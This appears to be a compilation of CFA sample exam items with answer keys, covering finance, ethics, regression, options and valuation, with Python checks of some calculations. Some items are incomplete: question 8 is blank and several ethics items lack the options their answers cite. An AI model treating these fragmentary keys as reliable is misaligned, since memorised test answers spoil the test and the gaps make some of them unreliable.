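As a check on question 5, the 28 observations can be tallied into the five classes directly:

```python
data = [63.5, 96.9, 112.3, 134.1,
        66.4, 98.3, 116.2, 138.5,
        75.6, 99.5, 116.9, 139.8,
        77.5, 100.7, 118.3, 140.7,
        84.4, 102.0, 122.0, 143.0,
        87.6, 105.5, 122.2, 153.9,
        89.9, 108.4, 124.5, 155.5]

# five classes of width 20, starting at "60 up to 80"
freqs = [sum(1 for x in data if lo <= x < lo + 20) for lo in range(60, 160, 20)]
print(freqs)  # [4, 6, 8, 6, 4] -> the third class, "100 up to 120", holds 8
```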
6. An analyst gathered the following information about the net profit margins of companies in two industries:
two industries:
Net Profit Margin Industry K Industry L
Mean 15.0% 5.0%
Standard deviation 2.0% 0.8%
Range 10.0% 15.0%
Compared with the other industry, the relative dispersion of net profit margins is smaller for Industry:
A. L, because it has a smaller mean deviation.
B. L, because it has a smaller range of variation.
C. K, because it has a smaller standard deviation.
D. K, because it has a smaller coefficient of variation.
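Relative dispersion in question 6 is measured by the coefficient of variation, the standard deviation divided by the mean; the two ratios can be computed directly:

```python
# coefficient of variation = standard deviation / mean
cv_k = 0.02 / 0.15   # Industry K
cv_l = 0.008 / 0.05  # Industry L
print(round(cv_k, 4), round(cv_l, 4))  # 0.1333 0.16 -> K has the smaller CV
```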
7. An individual deposits $10,000 at the beginning of each of the next 10 years, starting today, into an account paying 9 percent interest compounded annually. The amount of money in the account at the end of 10 years will be closest to:
A. $109,000.
B. $143,200.
C. $151,900.
D. $165,600.
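Question 7 describes an annuity due, since each deposit is made at the beginning of the year; the future value can be computed directly:

```python
payment, rate, n = 10_000, 0.09, 10
# ordinary-annuity future value, then one extra year of interest
# because each deposit is made at the start of the year (annuity due)
fv = payment * ((1 + rate) ** n - 1) / rate * (1 + rate)
print(round(fv, 2))  # about 165602.93 -> closest to $165,600
```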
8..
9. In hypothesis testing, a Type II error is:
A. rejecting the null hypothesis when it is true.
B. rejecting the null hypothesis when it is false.
C. accepting the null hypothesis when it is true.
D. accepting the null hypothesis when it is false.
10. An investment promises to pay $100 one year from today, $200 two years from today, and $300 three years from today. If the required rate of return is 14 percent, compounded annually, the value of this investment today is closest to:
A. $404.
B. $444.
C. $462.
D. $516.
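Question 10 asks for a present value; discounting each payment at 14 percent gives:

```python
rate = 0.14
cash_flows = [100, 200, 300]  # received 1, 2 and 3 years from today
pv = sum(cf / (1 + rate) ** t for t, cf in enumerate(cash_flows, start=1))
print(round(pv, 2))  # about 444.1 -> closest to $444
```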
11. According to new classical economists, financing a reduction in current taxes by government borrowing will most likely result in aggregate demand being:
A. decreased.
B. increased.
C. unaffected.
D. increased or reduced, depending on interest rate levels.
12. Which of the following is least likely to explain why government regulation is usually a sub-optimal response to monopolistic markets?
A. Regulatory agencies often reflect the views of special interests.
B. Owners of regulated companies can lack the incentive to operate at a low cost.
C. Regulatory agencies may lack information about the true costs and profits of companies.
D. Regulatory agencies can typically enforce marginal cost pricing but not average cost pricing.
13. The law of diminishing marginal utility states that the:
A. marginal return derived from making successive units of investment eventually declines.
B. additional satisfaction derived from consuming successive units of a product eventually declines.
C. additional satisfaction derived from consuming successive units of a product is limited by the amount of disposable income.
D. additional satisfaction derived from consuming successive units of a product can be increased by reducing the product price.
14. Which of the following statements best describes the relationship between the amount of accounting profits (assuming historical-cost-based accounting) and the amount of economic profits of a company?
A. Accounting profits and economic profits are similar.
B. Economic profits are greater than accounting profits.
C. Accounting profits are greater than economic profits.
D. No systematic relationship exists between accounting and economic profits.
15. If the effects are fully anticipated, what impact is expansionary monetary policy most likely to have on real economic activity?
A. Little or no impact.
B. Large expansionary impact.
C. Moderate expansionary impact.
D. Moderate contractionary impact.
Questions 16-20 assume U.S. GAAP (generally accepted accounting principles) unless otherwise noted.
16. An analyst should consider whether a company acquired assets through a capital lease or an operating lease because the company may structure:
A. operating leases to look like capital leases to enhance the company’s leverage ratios.
B. operating leases to look like capital leases to enhance the company’s liquidity ratios.
C. capital leases to look like operating leases to enhance the company’s leverage ratios.
D. capital leases to look like operating leases to enhance the company’s liquidity ratios.
17. A lease is most likely to be classified as an operating lease if the:
A. lease contains a bargain purchase option.
B. collectibility of lease payments by the lessor is unpredictable.
C. term of the lease is more than 75 percent of the estimated economic life of the leased property.
D. present value of the minimum lease payments equals or exceeds 90 percent of the fair value of the leased property.
18. In the Statement of Cash Flows, which of the following best describes whether interest received and interest paid, respectively, are classified as operating or investing cash flows?
Interest received Interest paid
A. Operating Operating
B. Operating Investing
C. Investing Operating
D. Investing Investing
19. An analyst gathered the following information about a fixed asset purchased by a company:
• Purchase price $12,000,000
• Estimated useful life 5 years
• Estimated salvage value $2,000,000
Using the double-declining-balance depreciation method, the company’s depreciation
expense in Year 2 will be closest to:
A. $2,000,000.
B. $2,400,000.
C. $2,880,000.
D. $7,680,000.
20. The following information applies to a company’s preferred stock:
• Current price $47.00 per share
• Par value $50.00 per share
• Annual dividend $3.50 per share
If the company’s marginal corporate tax rate is 34 percent, the after-tax cost of preferred
stock is closest to:
A. 4.62%.
B. 4.91%.
C. 7.00%.
D. 7.45%.
21. The divisor for the Dow Jones Industrial Average (DJIA) is most likely to decrease when a stock in the DJIA:
A. has a stock split.
B. has a reverse split.
C. pays a cash dividend.
D. is removed and replaced.
22. A silver futures contract requires the seller to deliver 5,000 Troy ounces of silver. An investor sells one July silver futures contract at a price of $8 per ounce, posting a $2,025 initial margin. If the required maintenance margin is $1,500, the price per ounce at which the investor would first receive a maintenance margin call is closest to:
A. $5.92.
B. $7.89.
C. $8.11.
D. $10.80.
23. The current price of an asset is 100. An out-of-the-money American put option with an exercise price of 90 is purchased along with the asset. If the breakeven point for this hedge is at an asset price of 114 at expiration, then the value of the American put at the time of purchase must have been:
A. 0.
B. 4.
C. 10.
D. 14.
24. An analyst gathered the following information about a company:
• 2001 net sales $10,000,000
• 2001 net profit margin 5.0%
• 2002 expected sales growth -15.0%
• 2002 expected profit margin 5.4%
• 2002 expected common stock shares outstanding 120,000
The company’s 2002 expected earnings per share is closest to:
A. $3.26.
B. $3.72.
C. $3.83.
D. $4.17.
25. An industry is currently growing at twice the rate of the overall economy. New competitors are entering the industry and the formerly high profit margins have begun to decline. The life cycle stage that best characterizes this industry is:
A. mature growth.
B. pioneering development.
C. rapid accelerating growth.
D. stabilization and market maturity.
26. The structure of an investment company is least likely to be characterized by:
A. a corporate form of organization.
B. investment of a pool of funds from many investors in a portfolio of investments.
C. an annual management fee ranging from 3 to 5 percent of the total value of the fund.
D. a board of directors who hires a separate investment management company to manage the portfolio of securities and to handle other administrative duties.
27. If an investor’s required return is 12 percent, the value of a 10-year maturity zero-coupon bond with a maturity value of $1,000 is closest to:
A. $312.
B. $688.
C. $1,000.
D. $1,312.
28. Which of the following is least likely to affect the required rate of return on an investment?
A. Real risk free rate.
B. Asset risk premium.
C. Expected rate of inflation.
D. Investors’ composite propensity to consume.
29. An individual investor’s investment objectives should be expressed in terms of:
A. risk and return.
B. capital market expectations.
C. liquidity needs and time horizon.
D. tax factors and legal and regulatory constraints.
30. A U.S. investor who buys Japanese bonds will most likely maximize his return if interest rates:
A. fall and the dollar weakens relative to the yen.
B. fall and the yen weakens relative to the dollar.
C. rise and the dollar weakens relative to the yen.
D. rise and the yen weakens relative to the dollar.
31. Arbitrage pricing theory (APT) and the capital asset pricing model (CAPM) are most similar with respect to their assumption that:
A. security returns are normally distributed.
B. a mean-variance efficient market portfolio exists and contains all risky assets.
C. an asset’s price is primarily determined by its covariance with one dominant factor.
D. unique risk factors are independent and will be diversified away in a large portfolio.
32. Which of the following statements best reflects the importance of the asset allocation decision to the investment process? The asset allocation decision:
A. helps the investor decide on realistic investment goals.
B. identifies the specific securities to include in a portfolio.
C. determines most of the portfolio’s returns and volatility over time.
D. creates a standard by which to establish an appropriate investment time horizon.
Answers:
1. A   2. D   3. A   4. D   5. D   6. D   7. D   8. C   9. D   10. B   11. C   12. D   13. B   14. C   15. A   16. C   17. B   18. A   19. C   20. D   21. A   22. C   23. D   24. C   25. A   26. C   27. A   28. D   29. A   30. A   31. D   32. C
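The quantitative answers above can be spot-checked numerically. The following Python sketch (not part of the original exam materials; variable names are mine) verifies questions 7, 10, 19, and 22:

```python
# Spot-checks for selected quantitative answers (illustrative only).

# Q7: FV of a $10,000 annuity due, 9% compounded annually, 10 years.
fv_annuity_due = 10_000 * ((1.09**10 - 1) / 0.09) * 1.09
# ~ $165,603 -> choice D ($165,600)

# Q10: PV of $100, $200, $300 due in 1, 2, 3 years at 14%.
pv = sum(cf / 1.14**t for t, cf in enumerate([100, 200, 300], start=1))
# ~ $444.10 -> choice B

# Q19: double-declining-balance, $12,000,000 cost, 5-year life
# (salvage value is ignored when computing DDB depreciation).
rate = 2 / 5
year1 = 12_000_000 * rate            # 4,800,000
year2 = (12_000_000 - year1) * rate  # 2,880,000 -> choice C

# Q22: short silver futures at $8/oz, 5,000 oz, $2,025 initial margin,
# $1,500 maintenance. Margin call when equity falls to maintenance:
# 2,025 - 5,000 * (P - 8) = 1,500  ->  P = 8 + 525/5,000
call_price = 8 + (2_025 - 1_500) / 5_000  # 8.105 -> closest to $8.11, choice C

print(round(fv_annuity_due), round(pv, 2), round(year2), round(call_price, 3))
```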
2003 Sample Level II:
Superior Asset Management has offices and provides investment advisory services to clients living in various countries. Each country has different securities laws and regulations, and no prohibition exists against using material nonpublic information:
• Home Country (HC) has no securities laws or regulations.
• Less Strict Country (LSC) has securities laws and regulations that are less strict than the requirements of the AIMR Code and Standards and also states that the law of the locality where business is conducted governs.
• More Strict Country (MSC) has securities laws and regulations that are more strict than the requirements of the AIMR Code and Standards and states that the law of the locality where clients reside governs.
Superior wants to ensure that its portfolio managers comply with the applicable laws, rules, and regulations of the various countries where Superior does business. Specifically, Superior is concerned about the activities of the following four portfolio managers:
• Diane Grant, an AIMR member, resides in LSC but does business in HC and LSC.
• Brenda Klein, a candidate in the CFA Program, resides in LSC and manages accounts for clients who reside in either LSC or MSC. LSC law applies.
• Chris Thompson, CFA, resides in MSC and does business in LSC with clients who are citizens of LSC. MSC law applies.
• John Wilson, an AIMR member, resides in HC and does business in HC, LSC, and MSC. LSC and MSC laws apply.
1. Which of the following best describes Grant’s responsibility under the AIMR Standards of Professional Conduct? Grant may:
A. not use material nonpublic information for her HC clients, her LSC clients, or herself.
B. use material nonpublic information for her HC clients, LSC clients, and for herself.
C. use material nonpublic information for her HC clients but not for her LSC clients or herself.
D. use material nonpublic information for her HC clients and LSC clients but not for herself.
2. According to AIMR Standards Klein must adhere to:
A. AIMR Code and Standards for her LSC and MSC clients.
B. MSC laws and regulations for both.
3. Thompson also manages accounts for clients who reside in MSC. According to AIMR Standards
Thompson must adhere to:
A. MSC laws and regulations for her LSC and MSC clients.
B. AIMR Code and Standards for her.
4. According to AIMR Standards Wilson must adhere to:
A. AIMR Code and Standards for his HC, LSC, and MSC clients.
B. The laws and regulations of MSC for his HC, LSC, and MSC clients.
C. AIMR Code and Standards for his HC and LSC clients and the laws and regulations of MSC for his MSC clients.
D. The laws and regulations of HC for his HC clients, the laws and regulations of LSC for his LSC clients, and the laws and regulations of MSC for his MSC clients.
Item Set #1 Guideline Answers:
1. A is correct. Because applicable law is less strict than the AIMR Code and Standards, the member must adhere to the Code and Standards, which say that material nonpublic information may not be used under any circumstances.
2. C is correct. When the AIMR Code and Standards impose a higher degree of responsibility than applicable laws, the AIMR Code and Standards must be applied. This is the case for Klein’s clients in LSC. If applicable law is more strict than the requirements of the Code and Standards, however, members, CFA charterholders, and candidates in the CFA program must adhere to applicable law. This is the case for Klein’s clients in MSC.
3. A is correct. An analyst or portfolio manager working in an international environment is required to have knowledge of the laws of the country where he or she is working. When involved with securities of a country with laws and regulations that are more strict than the AIMR Code and Standards, the stricter laws and regulations of the analyst’s home country (in this case MSC) prevail.
4. C is correct. If applicable law is more strict than the requirements of the AIMR Code and Standards, members, CFA charterholders, and candidates in the CFA program must adhere to applicable law. Thus, the Code and Standards apply to Wilson’s HC and LSC clients and the laws and regulations of MSC apply to his MSC clients.
Item Set #2 (Quantitative Analysis)
Peggy Parsons, CFA, wants to forecast sales of BoneMax, a prescription drug for treating osteoporosis. Parsons has developed the sales regression model shown in Exhibit 1 and supporting data found in Exhibits 2 and 3 to assist in her sales forecast of BoneMax.
Exhibit 1
BoneMax Sales Regression Model
SALES = 8.530 + 6.078 (POP) + 5.330 (INC) + 7.380 (ADV)
t-values: (2.48) (2.23) (2.10) (2.75)
Unadjusted R² = 0.804
Number of observations = 20 annual observations
Notes:
SALES = sales of BoneMax (US$ millions)
POP = population (millions) of U.S. women over age 60
INC = average income (US$ thousands) of U.S. women over age 60
ADV = advertising dollars spent on BoneMax (US$ millions)
Exhibit 2
Variable Estimates for 2002
POP 34.7
INC 27.4
ADV 8.2
Exhibit 3
Critical Values for Student’s t-Distribution
Degrees of      Area in Upper Tail
Freedom        10%       5%      2.5%
16           1.3368   1.7459   2.1199
17           1.3334   1.7396   2.1098
18           1.3304   1.7341   2.1009
19           1.3277   1.7291   2.0930
20           1.3253   1.7247   2.0860
1. Using the regression model developed, the sales forecast in millions of U.S. dollars for 2002 is closest to:
A. 215.
B. 280.
C. 417.
D. 426.
2. The unadjusted R² indicates that the intercept and the independent variables together explain:
A. 80.4% of total BoneMax annual sales.
B. 80.4% of the variability of BoneMax annual sales.
C. 89.7% of the variability of BoneMax annual sales.
D. less than 20% of the variability of BoneMax annual sales.
3. At the 5 percent level of significance, is the regression coefficient of the average income of U.S. women over the age of 60 (INC) significantly different from zero?
A. No, because 2.10 < 2.1199
B. Yes, because 2.10 > 1.7247
C. Yes, because 2.10 > 1.7459
D. Yes, because 2.10 > 2.0860
4. In testing the statistical significance of the regression coefficient of advertising dollars spent on BoneMax, Parsons must know which of the following inputs?
5. The standard error of the estimated coefficient for advertising dollars spent on BoneMax (ADV) is closest to:
A. 0.373.
B. 2.211.
C. 2.684.
D. 5.934.
Item Set #2, Guideline Answers
1. D is correct. 8.530 + (6.078 × 34.7) + (5.330 × $27.4) + (7.380 × $8.2) = $426.0 million.
2. B is correct.
3. A is correct because with df = 20 – (3+1) = 16 and a 2-tailed test (2.5% area in each tail), the critical t-value = 2.1199.
4. D is correct because both inputs are necessary to determine the statistical significance of an individual regression coefficient.
5. C is correct. The standard error is equal to 7.380/2.75.
(Answer choices for question 4 above:)
     Degrees of freedom   One-tailed or two-tailed test
A.   No                   No
B.   No                   Yes
C.   Yes                  No
D.   Yes                  Yes
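The regression answers above can be reproduced directly. A small Python sketch (not part of the original exam; names are mine) for answers 1, 3, and 5:

```python
# Regression from Exhibit 1: SALES = 8.530 + 6.078*POP + 5.330*INC + 7.380*ADV
b0, b_pop, b_inc, b_adv = 8.530, 6.078, 5.330, 7.380

# Exhibit 2 variable estimates for 2002
pop, inc, adv = 34.7, 27.4, 8.2

# Answer 1: plug the 2002 estimates into the fitted equation.
sales_2002 = b0 + b_pop * pop + b_inc * inc + b_adv * adv
# ~ $426.0 million (choice D)

# Answer 3: significance of INC at the 5% level, two-tailed.
# df = n - (k + 1) = 20 - 4 = 16; critical t (2.5% in each tail) = 2.1199,
# so the reported t = 2.10 < 2.1199 -> not significantly different from zero.
df = 20 - (3 + 1)

# Answer 5: standard error of the ADV coefficient = coefficient / t-statistic.
se_adv = b_adv / 2.75  # ~ 2.684 (choice C)

print(round(sales_2002, 1), df, round(se_adv, 3))
```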
2003 Sample Level III:
Emily Cassella is an investment manager in a bank trust department. She provides investment advice to high-net-worth clients and has developed a computer model that successfully identifies emerging market companies with the potential for earnings growth. Cassella is planning to leave the bank to start her own investment advisory firm that will provide the same level of services as the bank but at lower fees. After business hours, in a social context, she casually informs several of the bank’s clients of her plans and suggests that they switch their accounts to her firm once it is established. Cassella also contacts a number of potential clients that she had been actively soliciting for the bank to inform them that she is planning to start her new firm. She then contacts prospective clients that the bank has rejected as being too small. Several of the bank’s current clients, potential clients, and rejected prospects agree to transfer their accounts to Cassella’s firm once it is established.
Two weeks prior to announcing her resignation, Cassella applies to the appropriate regulatory authorities to ensure that she can complete and file the necessary registration documents so she can begin operating her business on the day she announces her resignation. She informs both of her research assistants at the bank that she will be resigning and asks them to help her start her new firm. Neither agrees to follow Cassella to her new firm.
Just prior to announcing her resignation, Cassella takes home some of her work that she believes will help her establish her new firm. This material includes sample marketing presentations that she designed; research material on several companies that Cassella has been following; investment ideas that were rejected by Cassella’s superiors at the bank; a list of her clients; a copy of the firm’s compliance procedures; and her clients’ records, including their investment objectives and constraints.
1. Cassella is planning to start her own firm while still employed by the bank. According to the AIMR Standards of Professional Conduct, which of the following best describes Cassella’s obligations in this situation? She:
A. must disclose the potential change in her employment to the bank’s clients and prospects.
B. must disclose the potential change in her employment to her direct supervisor at the bank.
C. may not breach her duty of loyalty to the bank in preparing to leave her current position.
D. may not seek alternative employment that could place her in direct competition with the bank.
2. With regard to Cassella’s solicitation of the bank’s current clients, which of the following statements is most accurate? Cassella:
A. has not violated the AIMR Standards if the solicited clients do not follow Cassella when she resigns.
B. has not violated the AIMR Standards because the solicitation was made after business hours and in a social setting.
C. has not violated the AIMR Standards because Cassella’s duty to inform the clients about the potential for reduced fees takes priority over her duty of loyalty to her employer.
D. has violated the AIMR Standards by soliciting the bank’s investment clients.
3. With regard to the bank’s potential clients and rejected prospects, which of the following statements is most accurate? Cassella:
A. has not violated the AIMR Standards if the potential clients are later rejected by the bank.
B. has not violated the AIMR Standards if potential clients’ fees are substantially lower at Cassella’s new firm.
C. may solicit the rejected prospects while she is employed by the bank and the potential clients after she starts her new firm.
D. may not solicit either group because both the potential clients and the rejected prospects represent potential business opportunities for the bank.
4. With regard to Cassella’s removal of the sample marketing presentations and the research materials, which of the following statements is most accurate? Cassella:
A. has violated the AIMR Standards because the research materials may include nonpublic information.
B. has violated the AIMR Standards even if Cassella never uses either of them for the benefit of her new firm.
C. may remove the sample marketing presentations if they do not include confidential information about the bank or its clients.
D. may remove the research material if it is factual information published by recognized financial and statistical reporting services.
5. With regard to Cassella taking the computer model and the rejected investment ideas from the bank, which of the following statements is most accurate? Cassella:
A. may take the computer model solely for her personal use and the rejected investment ideas for use by her new firm.
B. may not take the rejected investment ideas or the computer model because they remain the property of the bank.
C. may take the rejected investment ideas, because the bank is not using them, but she may not take the computer model because it is proprietary information.
D. may take both the computer model and the rejected investment ideas because she personally developed both and they are her property.
6. With regard to Cassella’s removal of the compliance procedures from the bank, which of the following statements is most accurate? Cassella:
A. has violated the AIMR Standards because Cassella developed them for use by the bank.
B. has not violated the AIMR Standards because AIMR requires adequate compliance procedures at all member firms.
C. has not violated the AIMR Standards if they are copied directly from the AIMR Standards of Professional Conduct.
D. has not violated the AIMR Standards if they are used solely to promote adherence to the AIMR Code and Standards by Cassella and her new firm.
Guideline Answers:
1. C is correct. Cassella is not allowed to breach her duty of loyalty to the bank in preparing to leave. However, she does not need to notify anyone of her pending departure, and she is free to seek other employment.
2. D is correct. Cassella may not solicit current or potential clients of the bank prior to leaving the bank, whether in a social setting or any other setting. The reduced-fee potential is not a criterion for allowing her to solicit them. It does not matter whether the clients leave or not; the act of soliciting them would be a violation.
3. C is correct. Cassella may solicit rejected prospects while she is still employed by the bank because they do not represent competition with the bank. She must do this on her own time, however, so that she fulfills her duty to her current employer. Prior to leaving the bank, she may not solicit potential clients, but once she leaves she is free to contact them. The reduced-fee potential is not a criterion for allowing her to solicit the potential clients as long as she works for the bank. It does not matter whether the bank eventually rejects the potential clients; the act of soliciting them would be a violation as long as they have not been rejected.
4. B is correct. Cassella may not remove the sample marketing presentations and research materials from the bank. The fact that the materials are never used to benefit her new firm does not change the fact that they are the property of the bank and may not be removed. If Cassella had written permission, she could remove the materials without violating the Standards. It does not matter whether the materials contain confidential or nonpublic information; the act of removing them would be a violation. It also does not matter whether the materials are factual information; they are the property of the bank because they were gathered on the bank’s time.
5. B is correct. Cassella may not remove the computer model and the rejected investment ideas from the bank. The fact that she developed them does not change the fact that they are the property of the bank and may not be removed. They are not her property and she may not use them.
6. A is correct. Cassella may not remove the compliance procedures from the bank. They are the property of the bank and may not be removed. Their source and use do not change the situation.
Item Set #2 (Derivatives)
Joel Franklin is a portfolio manager responsible for derivatives. Franklin observes European-style put options and call options on Abaco Ltd. common stock with the same strike price and time to expiration. Selected information relevant to Abaco Ltd. stock and options is shown in Exhibit 1.
Exhibit 1
Abaco Ltd. Securities Selected Data
Closing price of Abaco common stock $43.00
Put and call option exercise price $45.00
Time to expiration One year
Price of the European-style put option $4.00
Price of the European-style call option
One-year risk-free rate, compounded continuously 5.50%
Samantha Crowe, a colleague of Franklin, believes that Abaco stock is overpriced and she decides to sell short the stock. However, her broker informs her that an adequate inventory of the stock may not be available to sell short.
1. Based on a put-call parity, the value of the European-style call option is closest to:
A. $0.00.
B. $2.00.
C. $4.35.
D. $4.41.
2. If the volatility of Abaco’s stock price decreases, what is most likely to happen to the values of the related call and put?
A. Both the call and the put will decrease in value.
B. Both the call and the put will increase in value.
C. The value of the call will increase while the value of the put will decrease.
D. The value of the call will decrease while the value of the put will increase.
3. Franklin considers buying a European-style put option with an exercise price of $40.00 and one year to expiration. Based on the information provided in Exhibit 1 about the options with an exercise price of $45.00, what should be the price of a put option with an exercise price of $40.00?
A. Less than or equal to $1.00.
B. Greater than $1.00 but less than or equal to $3.00.
C. Greater than $3.00 but less than or equal to $9.00.
D. Greater than $9.00.
4. Which of the following actions, if executed by Crowe at the correct exercise prices, times to expiration, and face values, will accomplish the same payoff as the original short sale strategy?
A. Buy a pure discount risk-free bond, buy a put option, buy a call option.
B. Short a pure discount risk-free bond, buy a put option, buy a call option.
C. Buy a pure discount risk-free bond, sell a put option, buy a call option.
D. Short a pure discount risk-free bond, buy a put option, sell a call option.
5. The Chief Economist at Franklin’s firm is forecasting a substantial decline in interest rates. To help gain from this forecast while assuming limited risk, Franklin should take which of the following actions with regard to the European-style options in Exhibit 1?
A. Buy the call option.
B. Buy the put option.
C. Sell the call option.
D. Sell the put option.
6. Franklin considers selling the European-style put option described in Exhibit 1. Ignoring time value of money and given current prices, the maximum possible loss from this strategy is:
A. $39.00.
B. $41.00.
C. $45.00.
D. Unlimited.
Item Set #2 Guideline Answers
1. D is correct. c = S + p – Xe^(–r(T–t))
$4.408 = $43.00 + $4.00 – $45.00e^(–0.055×1)
2. A is correct. The volatility of the stock is directly related to the price of the call option and the put option, so a decrease in volatility will cause the price of both the call and the put to decrease.
3. B is correct. The price of the put option is its time value plus intrinsic value. The time value should be about $2.00 (from the $45.00 exercise price) and the intrinsic value will be $0.00. This will place the price of the put at about $2.00, depending upon the volatility of Abaco stock. Both options (exercise prices of $40 and $45) have the same time to expiration and similar time values, and both options are European.
4. D is correct. Put-call parity can be written as c = S + p – Xe^(–r(T–t)), which can be rewritten as –S = –Xe^(–r(T–t)) + p – c. The left-hand side can be read as shorting the stock, and the right-hand side as shorting a pure discount risk-free bond, buying a put, and shorting a call.
5. B is correct. According to the Black-Scholes Option Pricing Model, a change in the risk-free interest rate (“rho”) is directly related to the value of a call option and inversely related to the value of a put option. A decrease in interest rates should cause the price of the call to fall and the price of the put to increase. Buying a put and selling a call will both result in gains, but selling a naked call is an unlimited-risk strategy. Therefore, buying a put is the most appropriate choice.
6. B is correct because the upper boundary for a put option price is reached when the stock is worthless (S = 0). Here, the put holder will have the right to sell the stock for $45 when it is worth nothing in the market. The put writer will lose ($45 – $4) = $41.
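Answers 1 and 6 can be checked numerically. A Python sketch (not part of the original guideline answers; names are mine) using the Exhibit 1 inputs:

```python
import math

# Exhibit 1 inputs
S, X, T, r, put = 43.00, 45.00, 1.0, 0.055, 4.00

# Answer 1: put-call parity with continuous compounding, c = S + p - X*e^(-rT)
call = S + put - X * math.exp(-r * T)
# ~ $4.41 (choice D)

# Answer 6: maximum loss from writing the put (ignoring time value of money):
# the stock can fall to zero, so the writer pays X but keeps the $4 premium.
max_loss = X - put  # $41.00 (choice B)

print(round(call, 2), max_loss)
```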
Firm value = FCFF1/(1 + WACC)^1 + FCFF2/(1 + WACC)^2 + FCFF3/(1 + WACC)^3 + Terminal Value3/(1 + WACC)^3
where FCFF = EBIT × (1 – t) + Depr – (Cap Ex) – ΔWC
2002 Level II Guideline Answers
Morning Session - Page 2
FCFF for DCom                              2001        2002       2003       2004
EBIT                                     ($69.68)    ($47.51)   ($10.52)
After-tax rate = (1 – t)                     0.7         0.7        0.7
Depreciation & Amortization = Depr       $129.00     $136.50    $144.00
Less Capital Expenditures = (Cap Ex)     $400.00      $50.00     $50.00
Less Change in Working Capital = ΔWC       $5.19      ($4.32)    ($6.47)
Free cash flows to the firm = FCFF      ($324.97)     $57.56     $93.11    $107.08*
Growth Rate = g                              50%         50%        50%       15%
Terminal Value2003 = FCFF2004 / (WACC – g2004) = $5,354.00
PV of FCFF @ 17%**                      ($277.75)     $42.05     $58.14
PV of terminal value at 17%                                      $3,342.88
DCom’s total firm value at end of year 2000 = $3,165.32 million
*FCFF2004 = FCFF2003 × (1 + g2004) = $93.11 × 1.15
**WACC = 17%
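The valuation above can be rebuilt from the raw inputs. A Python sketch (not part of the original guideline answer; names are mine, and small differences versus the table reflect the guideline's intermediate rounding):

```python
# Rebuild DCom's firm value from the FCFF inputs above (values in $ millions).
ebit = [-69.68, -47.51, -10.52]   # 2001-2003
depr = [129.00, 136.50, 144.00]
capex = [400.00, 50.00, 50.00]
d_wc = [5.19, -4.32, -6.47]       # change in working capital (ΔWC)
tax_rate, wacc, g_terminal = 0.30, 0.17, 0.15

# FCFF = EBIT*(1 - t) + Depr - CapEx - ΔWC
fcff = [e * (1 - tax_rate) + d - c - w
        for e, d, c, w in zip(ebit, depr, capex, d_wc)]
# ~ [-324.97, 57.56, 93.11]

# Terminal value at end of 2003, grown one year at 15%, capitalized at WACC - g.
terminal_value = fcff[-1] * (1 + g_terminal) / (wacc - g_terminal)  # ~ 5,354

# Discount three years of FCFF and the terminal value back to end of 2000.
pv_fcff = sum(cf / (1 + wacc) ** t for t, cf in enumerate(fcff, start=1))
pv_terminal = terminal_value / (1 + wacc) ** 3

firm_value = pv_fcff + pv_terminal  # ~ $3,165 million
print(round(firm_value, 1))
```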
B. The total firm value as determined by the FCFF model is not the appropriate measure of value to estimate the contribution DCom should make to the market price of Jones Group equity. To address the effect of DCom on Jones Group’s value, the value of DCom must first be apportioned between bondholders and equity holders, which the FCFF approach does not do. Because DCom has a positive amount of debt outstanding, using the total firm value as determined by FCFF without adjustment for DCom’s debt will overstate DCom’s expected contribution to the value of Jones Group’s equity.
The FCFF model could be used in this situation, but only if the market value of DCom debt is deducted from the value computed using the model. Deducting the market value of the debt effectively apportions the value of DCom between the bondholders and equity holders.
LEVEL II, QUESTION 2
Topic: Asset Valuation
Minutes: 16
Reading References:
“Competitive Strategy: The Core Concepts,” Michael E. Porter, Competitive Advantage: Creating and Sustaining Superior Performance (The Free Press, 1985), 2002 CFA Level II Candidate Readings
Purpose:
To test the candidate’s ability to identify the competitive factors in an industry that influence the performance of companies in that industry.
LOS: The candidate should be able to
“Competitive Strategy: The Core Concepts” (Study Session 9)
a) analyze the competitive advantage and competitive strategy of a company and the competitive forces that affect the profitability of a company;
b) analyze basic types of competitive advantage that a company can possess and the generic strategies for achieving a competitive advantage.
Guideline Answer:
A.
Identify the competitive strategy being used by DCom: Differentiation Focus
Describe two characteristics of that strategy:
1. The company seeks to focus on a segment or group of segments within an industry by tailoring its strategy to serve that segment/group to the exclusion of others.
2. The company seeks to achieve a competitive advantage in a target segment even though it does not possess a competitive advantage overall.
3. The company does not seek to compete on price but on tailored product offerings. As a result, the company’s product usually commands a price premium.
Identify two of Anderson’s responses that support that strategy (circle two numbers):
Response 1 identifies the focused target market.
Response 4 identifies the specific method of differentiation (network reliability).
B.
Identify the competitive strategy most likely to be used by traditional telephone companies in the long-haul data communications industry: Cost Leadership
Describe two characteristics of that strategy:
1. A company decides to become the low-cost provider in the industry.
2. A company seeks to serve a broad scope of customers with a generic product offering.
3. A company adopting this strategy believes that there is little room to differentiate its products or services from those of its competitors on any basis other than cost.
Identify two of Blume’s observations that support that strategy (circle two numbers):
Observation 3 identifies extremely low cost base as a source of potential competitive advantage for established service providers.
Observation 5 identifies removal of regulation as a means to allow entry by established service providers with technology and infrastructure in place to serve the broad market.
LEVEL II, QUESTION 3
Topic: Asset Valuation
Minutes: 11
Reading Reference:
Analysis for Financial Management, 6th edition, Robert C. Higgins (Irwin, 2000)
B. “Managing Growth,” Ch. 4
Purpose:
To test the candidate’s ability to calculate the sustainable growth rate and to determine what corrective actions should be taken in the event that the sustainable growth rate diverges from the actual growth rate.
LOS: The candidate should be able to
“Managing Growth” (Study Session 8)
a) explain the concept of sustainable growth and identify its determinants;
b) calculate the sustainable growth of a company, given balance sheet and income statement data;
c) describe the courses of action that a company could take when actual growth exceeds sustainable growth and the possible effects of those actions on the company;
d) describe the courses of action that a company could take when sustainable growth exceeds actual growth and the possible effects of those actions on the company.
Guideline Answer:
A.
Profit Margin = Net income / Sales = P
= $122.69 / $1,833.45 = 0.066918
Retention Rate = 1 – (Dividends / Net income) = R
= 1 – $88.18 / $122.69 = 0.281278
Asset Turnover = Sales / Assets = A
= $1,833.45 / $3,100.85 = 0.591273
Financial Leverage = Assets / Equity = T
T = $3,100.85 / $1,475.16 = 2.102043
T* = $3,100.85 / $1,440.64 = 2.152411
g = P × R × A × T = 2.35%
g* = P × R × A × T* = 2.40%
* Calculated with beginning of period Equity
Alternate calculation 1:
Return on Equity = Net income / Average Equity = ROE
= $122.69 / $1,457.90* = 0.084155
Retention Rate = 1 – (Dividends / Net income) = R
= 1– ($88.18 / $122.69) = 0.281278
g = ROE × R = 2.37%
*Average equity = ($1,440.64 + $1,475.16) / 2
Alternate calculation 2:
